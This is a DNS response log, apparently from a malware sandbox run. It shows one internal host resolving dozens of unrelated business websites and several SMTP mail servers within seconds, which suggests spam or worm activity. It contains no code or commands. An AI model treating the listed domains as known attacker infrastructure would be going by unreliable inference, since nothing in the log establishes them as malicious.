Mar 22, 2023 05:43:42.572885036 CET	8.8.8.8	192.168.2.5	0x64d9	No error (0)	www.findbc.com		13.248.216.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.572885036 CET	8.8.8.8	192.168.2.5	0x64d9	No error (0)	www.findbc.com		76.223.65.111	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.574079990 CET	8.8.8.8	192.168.2.5	0x5da	No error (0)	www.aevga.com	aevga.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:42.574079990 CET	8.8.8.8	192.168.2.5	0x5da	No error (0)	aevga.com		108.167.164.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.678854942 CET	8.8.8.8	192.168.2.5	0x5ad5	No error (0)	www.jchysk.com		208.97.178.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.706525087 CET	8.8.8.8	192.168.2.5	0xbc2a	No error (0)	www.tyrns.com		62.75.216.137	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.343671083 CET	8.8.8.8	192.168.2.5	0x45e5	No error (0)	www.spanesi.com		5.196.166.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.427293062 CET	8.8.8.8	192.168.2.5	0x523	No error (0)	www.c9dd.com		188.166.152.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.444685936 CET	8.8.8.8	192.168.2.5	0xf2a0	No error (0)	www.stnic.co.uk		77.68.50.105	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.450680971 CET	8.8.8.8	192.168.2.5	0x428e	No error (0)	www.dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.450680971 CET	8.8.8.8	192.168.2.5	0x428e	No error (0)	www.dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.522350073 CET	8.8.8.8	192.168.2.5	0x2eb3	No error (0)	www.fink.com		69.163.218.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.533936977 CET	8.8.8.8	192.168.2.5	0x47fd	No error (0)	www.tc17.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.533936977 CET	8.8.8.8	192.168.2.5	0x47fd	No error (0)	www.tc17.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.808734894 CET	8.8.8.8	192.168.2.5	0xcff2	No error (0)	www.domon.com	meubles-domon.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:43.808734894 CET	8.8.8.8	192.168.2.5	0xcff2	No error (0)	meubles-domon.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:43.808734894 CET	8.8.8.8	192.168.2.5	0xcff2	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.848126888 CET	8.8.8.8	192.168.2.5	0x55dc	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.942044020 CET	8.8.8.8	192.168.2.5	0x4b93	No error (0)	www.mobilnic.net		154.203.14.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:44.035718918 CET	8.8.8.8	192.168.2.5	0xb230	No error (0)	www.stajum.com		103.3.1.161	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:44.107966900 CET	8.8.8.8	192.168.2.5	0x2c06	No error (0)	www.pwd.org	pwd.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:44.107966900 CET	8.8.8.8	192.168.2.5	0x2c06	No error (0)	pwd.org		208.109.214.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:44.708728075 CET	8.8.8.8	192.168.2.5	0xcc04	No error (0)	www.nqks.com	live.websites.hibu.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:44.708728075 CET	8.8.8.8	192.168.2.5	0xcc04	No error (0)	live.websites.hibu.com	hibu-4.zenedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:44.708728075 CET	8.8.8.8	192.168.2.5	0xcc04	No error (0)	hibu-4.zenedge.net	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:44.708728075 CET	8.8.8.8	192.168.2.5	0xcc04	No error (0)	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net	hibu34.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:44.708728075 CET	8.8.8.8	192.168.2.5	0xcc04	No error (0)	hibu34.inregion.waas.oci.oraclecloud.net		147.154.3.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:45.177572966 CET	8.8.8.8	192.168.2.5	0xe298	No error (0)	www.myropcb.com		74.208.215.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:45.616159916 CET	8.8.8.8	192.168.2.5	0xb669	No error (0)	www.pupi.cz		103.224.182.241	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.097738981 CET	8.8.8.8	192.168.2.5	0x250f	No error (0)	www.holleman.us		51.79.51.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.404036045 CET	8.8.8.8	192.168.2.5	0x1033	No error (0)	www.yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.544437885 CET	8.8.8.8	192.168.2.5	0x77e2	No error (0)	www.netcr.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:46.544437885 CET	8.8.8.8	192.168.2.5	0x77e2	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:46.544437885 CET	8.8.8.8	192.168.2.5	0x77e2	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.544437885 CET	8.8.8.8	192.168.2.5	0x77e2	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.713511944 CET	8.8.8.8	192.168.2.5	0xaa84	No error (0)	smtp.sbcglobal.yahoo.com	smtp-sbc.mail.yahoo.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:46.713511944 CET	8.8.8.8	192.168.2.5	0xaa84	No error (0)	smtp-sbc.mail.yahoo.com	smtp1.sbc.mail.am0.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:46.713511944 CET	8.8.8.8	192.168.2.5	0xaa84	No error (0)	smtp1.sbc.mail.am0.yahoodns.net		67.195.12.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.713511944 CET	8.8.8.8	192.168.2.5	0xaa84	No error (0)	smtp1.sbc.mail.am0.yahoodns.net		66.163.170.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.713511944 CET	8.8.8.8	192.168.2.5	0xaa84	No error (0)	smtp1.sbc.mail.am0.yahoodns.net		66.218.88.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.909080029 CET	8.8.8.8	192.168.2.5	0x428a	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.990920067 CET	8.8.8.8	192.168.2.5	0x250f	Server failure (2)	www.holleman.us	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.057709932 CET	8.8.8.8	192.168.2.5	0x250f	No error (0)	www.holleman.us		51.79.51.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.084330082 CET	8.8.8.8	192.168.2.5	0x8dd3	No error (0)	www.kernsafe.com		172.67.72.98	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.084330082 CET	8.8.8.8	192.168.2.5	0x8dd3	No error (0)	www.kernsafe.com		104.26.2.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.084330082 CET	8.8.8.8	192.168.2.5	0x8dd3	No error (0)	www.kernsafe.com		104.26.3.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.265321016 CET	8.8.8.8	192.168.2.5	0x96c2	No error (0)	www.medius.si	d2r2uj0bnofxxz.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:47.265321016 CET	8.8.8.8	192.168.2.5	0x96c2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.265321016 CET	8.8.8.8	192.168.2.5	0x96c2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.265321016 CET	8.8.8.8	192.168.2.5	0x96c2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.265321016 CET	8.8.8.8	192.168.2.5	0x96c2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.591526031 CET	8.8.8.8	192.168.2.5	0xa5c6	No error (0)	www.lrsuk.com	language-recruitment.eu-2.volcanic.cloud		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:47.591526031 CET	8.8.8.8	192.168.2.5	0xa5c6	No error (0)	language-recruitment.eu-2.volcanic.cloud	d2kt7vovxa5e81.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:47.591526031 CET	8.8.8.8	192.168.2.5	0xa5c6	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.591526031 CET	8.8.8.8	192.168.2.5	0xa5c6	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.109	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.591526031 CET	8.8.8.8	192.168.2.5	0xa5c6	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.591526031 CET	8.8.8.8	192.168.2.5	0xa5c6	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.105	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.980047941 CET	8.8.8.8	192.168.2.5	0xfde6	No error (0)	www.ka-mo-me.com		211.1.226.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.173830032 CET	8.8.8.8	192.168.2.5	0xd080	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.174761057 CET	8.8.8.8	192.168.2.5	0x8320	No error (0)	www.iamdirt.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:48.174761057 CET	8.8.8.8	192.168.2.5	0x8320	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:48.174761057 CET	8.8.8.8	192.168.2.5	0x8320	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.209358931 CET	8.8.8.8	192.168.2.5	0xfc4c	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.424428940 CET	8.8.8.8	192.168.2.5	0xfb9a	No error (0)	www.wifi4all.nl		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.424428940 CET	8.8.8.8	192.168.2.5	0xfb9a	No error (0)	www.wifi4all.nl		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.605401993 CET	8.8.8.8	192.168.2.5	0xdffc	No error (0)	www.fcwcvt.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.605401993 CET	8.8.8.8	192.168.2.5	0xdffc	No error (0)	www.fcwcvt.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.097809076 CET	8.8.8.8	192.168.2.5	0x5c69	No error (0)	www.com-sit.com		104.26.10.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.097809076 CET	8.8.8.8	192.168.2.5	0x5c69	No error (0)	www.com-sit.com		172.67.70.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.097809076 CET	8.8.8.8	192.168.2.5	0x5c69	No error (0)	www.com-sit.com		104.26.11.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.198414087 CET	8.8.8.8	192.168.2.5	0x7c46	No error (0)	www.snugpak.com		104.21.73.182	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.198414087 CET	8.8.8.8	192.168.2.5	0x7c46	No error (0)	www.snugpak.com		172.67.165.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.498873949 CET	8.8.8.8	192.168.2.5	0xd30c	No error (0)	www.photo4b.com		195.78.66.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.851002932 CET	8.8.8.8	192.168.2.5	0xeeac	No error (0)	www.crcsi.org	crcsi.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:49.851002932 CET	8.8.8.8	192.168.2.5	0xeeac	No error (0)	crcsi.org		165.227.252.190	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:50.130003929 CET	8.8.8.8	192.168.2.5	0xb57d	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:50.130003929 CET	8.8.8.8	192.168.2.5	0xb57d	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:50.242110014 CET	8.8.8.8	192.168.2.5	0x98bc	No error (0)	www.ora-ito.com		213.186.33.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:50.625988007 CET	8.8.8.8	192.168.2.5	0x64e2	No error (0)	www.yocinc.org		66.94.119.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:52.088594913 CET	8.8.8.8	192.168.2.5	0x1391	No error (0)	smtp.live.com	a-0010.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:53.071202040 CET	8.8.8.8	192.168.2.5	0x26d5	No error (0)	www.fnsds.org	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:53.071202040 CET	8.8.8.8	192.168.2.5	0x26d5	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:53.071202040 CET	8.8.8.8	192.168.2.5	0x26d5	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		54.236.92.93	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:53.071202040 CET	8.8.8.8	192.168.2.5	0x26d5	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		34.237.200.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:53.534262896 CET	8.8.8.8	192.168.2.5	0xe534	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:53.582869053 CET	8.8.8.8	192.168.2.5	0xe534	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:53.699426889 CET	8.8.8.8	192.168.2.5	0x5bc1	No error (0)	www.pohlfood.com	pohlfood.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:53.699426889 CET	8.8.8.8	192.168.2.5	0x5bc1	No error (0)	pohlfood.com		104.218.10.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:54.532502890 CET	8.8.8.8	192.168.2.5	0xe534	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:54.634453058 CET	8.8.8.8	192.168.2.5	0xb031	No error (0)	www.ottospm.com	www.ottospm.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:54.646883965 CET	8.8.8.8	192.168.2.5	0xe78f	No error (0)	www.valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:55.643063068 CET	8.8.8.8	192.168.2.5	0xe84c	No error (0)	www.11tochi.net		157.112.176.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:57.985970974 CET	8.8.8.8	192.168.2.5	0xf02	No error (0)	www.2print.com	2print.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:57.985970974 CET	8.8.8.8	192.168.2.5	0xf02	No error (0)	2print.com		107.180.98.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:57.989377975 CET	8.8.8.8	192.168.2.5	0x20fc	No error (0)	www.tyrns.com		62.75.216.137	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:58.064048052 CET	8.8.8.8	192.168.2.5	0xf716	No error (0)	www.railbook.net		207.244.76.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:58.464632988 CET	8.8.8.8	192.168.2.5	0xa513	No error (0)	www.x0c.com		185.53.177.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:58.590908051 CET	8.8.8.8	192.168.2.5	0xc3a5	No error (0)	www.pb-games.com	pb-games.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:58.590908051 CET	8.8.8.8	192.168.2.5	0xc3a5	No error (0)	pb-games.com		173.254.28.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.072774887 CET	8.8.8.8	192.168.2.5	0x1590	No error (0)	www.spanesi.com		5.196.166.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.102511883 CET	8.8.8.8	192.168.2.5	0x9778	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.308209896 CET	8.8.8.8	192.168.2.5	0x5036	No error (0)	www.tc17.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.308209896 CET	8.8.8.8	192.168.2.5	0x5036	No error (0)	www.tc17.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.737757921 CET	8.8.8.8	192.168.2.5	0x1e11	No error (0)	www.sclover3.com		157.112.182.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.064258099 CET	8.8.8.8	192.168.2.5	0xe333	No error (0)	www.medius.si	d2r2uj0bnofxxz.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:00.064258099 CET	8.8.8.8	192.168.2.5	0xe333	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.064258099 CET	8.8.8.8	192.168.2.5	0xe333	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.064258099 CET	8.8.8.8	192.168.2.5	0xe333	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.064258099 CET	8.8.8.8	192.168.2.5	0xe333	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.394572973 CET	8.8.8.8	192.168.2.5	0xdc69	No error (0)	smtp.live.com	a-0010.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:00.614660978 CET	8.8.8.8	192.168.2.5	0xd644	No error (0)	www.ka-mo-me.com		211.1.226.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.007332087 CET	8.8.8.8	192.168.2.5	0x15	No error (0)	www.nunomira.com	nunomira.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:01.007332087 CET	8.8.8.8	192.168.2.5	0x15	No error (0)	nunomira.com		192.241.158.94	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.294930935 CET	8.8.8.8	192.168.2.5	0x6c8b	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:01.294930935 CET	8.8.8.8	192.168.2.5	0x6c8b	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.354341984 CET	8.8.8.8	192.168.2.5	0xd23a	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.357665062 CET	8.8.8.8	192.168.2.5	0xed64	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.015710115 CET	8.8.8.8	192.168.2.5	0x562	No error (0)	www.com-sit.com		172.67.70.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.015710115 CET	8.8.8.8	192.168.2.5	0x562	No error (0)	www.com-sit.com		104.26.10.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.015710115 CET	8.8.8.8	192.168.2.5	0x562	No error (0)	www.com-sit.com		104.26.11.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.062458992 CET	8.8.8.8	192.168.2.5	0x1296	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.157380104 CET	8.8.8.8	192.168.2.5	0xb8d6	No error (0)	www.vexcom.com		172.67.173.200	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.157380104 CET	8.8.8.8	192.168.2.5	0xb8d6	No error (0)	www.vexcom.com		104.21.55.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.339396954 CET	8.8.8.8	192.168.2.5	0xa326	No error (0)	www.sjbs.org	sjbs.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:02.339396954 CET	8.8.8.8	192.168.2.5	0xa326	No error (0)	sjbs.org		69.163.239.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.869827032 CET	8.8.8.8	192.168.2.5	0x9c57	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:02.869827032 CET	8.8.8.8	192.168.2.5	0x9c57	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:02.928914070 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	www.yocinc.org		66.94.119.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:03.056376934 CET	8.8.8.8	192.168.2.5	0x8180	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:03.526135921 CET	8.8.8.8	192.168.2.5	0x28	No error (0)	www.maktraxx.com	maktraxx.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:03.526135921 CET	8.8.8.8	192.168.2.5	0x28	No error (0)	maktraxx.com		72.44.93.236	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:03.775068045 CET	8.8.8.8	192.168.2.5	0x448e	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.117820024 CET	8.8.8.8	192.168.2.5	0x9f6b	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.227833986 CET	8.8.8.8	192.168.2.5	0x7de2	No error (0)	www.cel-cpa.com		104.196.26.65	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.383115053 CET	8.8.8.8	192.168.2.5	0x9189	No error (0)	www.valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:04.892518044 CET	8.8.8.8	192.168.2.5	0x9029	No error (0)	www.2print.com	2print.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:04.892518044 CET	8.8.8.8	192.168.2.5	0x9029	No error (0)	2print.com		107.180.98.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.291953087 CET	8.8.8.8	192.168.2.5	0x5f07	No error (0)	www.fe-bauer.de		3.65.101.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.485883951 CET	8.8.8.8	192.168.2.5	0x9660	No error (0)	www.x0c.com		185.53.177.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.543407917 CET	8.8.8.8	192.168.2.5	0x7c74	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:05.724833965 CET	8.8.8.8	192.168.2.5	0xff94	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:06.339685917 CET	8.8.8.8	192.168.2.5	0xd92e	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:06.920558929 CET	8.8.8.8	192.168.2.5	0x91c5	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:08.299709082 CET	8.8.8.8	192.168.2.5	0x1f75	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.283288002 CET	8.8.8.8	192.168.2.5	0xff3d	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.355811119 CET	8.8.8.8	192.168.2.5	0x8198	No error (0)	www.ottospm.com	www.ottospm.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:09.363353968 CET	8.8.8.8	192.168.2.5	0xea3a	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:09.372734070 CET	8.8.8.8	192.168.2.5	0xd9b7	No error (0)	www.tyrns.com		62.75.216.137	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.079336882 CET	8.8.8.8	192.168.2.5	0xfad1	No error (0)	www.spanesi.com		5.196.166.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.277365923 CET	8.8.8.8	192.168.2.5	0xbcf9	No error (0)	www.tc17.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.277365923 CET	8.8.8.8	192.168.2.5	0xbcf9	No error (0)	www.tc17.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.866060972 CET	8.8.8.8	192.168.2.5	0xe705	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:10.951620102 CET	8.8.8.8	192.168.2.5	0x1ed1	No error (0)	www.railbook.net		81.171.22.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:11.530921936 CET	8.8.8.8	192.168.2.5	0x8fc8	No error (0)	www.fnsds.org	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:11.530921936 CET	8.8.8.8	192.168.2.5	0x8fc8	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:11.530921936 CET	8.8.8.8	192.168.2.5	0x8fc8	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		34.237.200.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:11.530921936 CET	8.8.8.8	192.168.2.5	0x8fc8	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		54.236.92.93	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:12.050789118 CET	8.8.8.8	192.168.2.5	0x7930	No error (0)	www.pohlfood.com	pohlfood.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:12.050789118 CET	8.8.8.8	192.168.2.5	0x7930	No error (0)	pohlfood.com		104.218.10.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:13.368025064 CET	8.8.8.8	192.168.2.5	0xd6a8	No error (0)	gmail-smtp-in.l.google.com		142.251.31.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:13.672785044 CET	8.8.8.8	192.168.2.5	0x415b	No error (0)	www.11tochi.net		157.112.176.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:16.283302069 CET	8.8.8.8	192.168.2.5	0x1ee2	No error (0)	www.pb-games.com	pb-games.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:16.283302069 CET	8.8.8.8	192.168.2.5	0x1ee2	No error (0)	pb-games.com		173.254.28.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:16.788959026 CET	8.8.8.8	192.168.2.5	0x45f2	No error (0)	gmail-smtp-in.l.google.com		142.251.31.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:17.616628885 CET	8.8.8.8	192.168.2.5	0xad03	No error (0)	www.sclover3.com		157.112.182.239	A (IP address)	IN (0x0001)	false
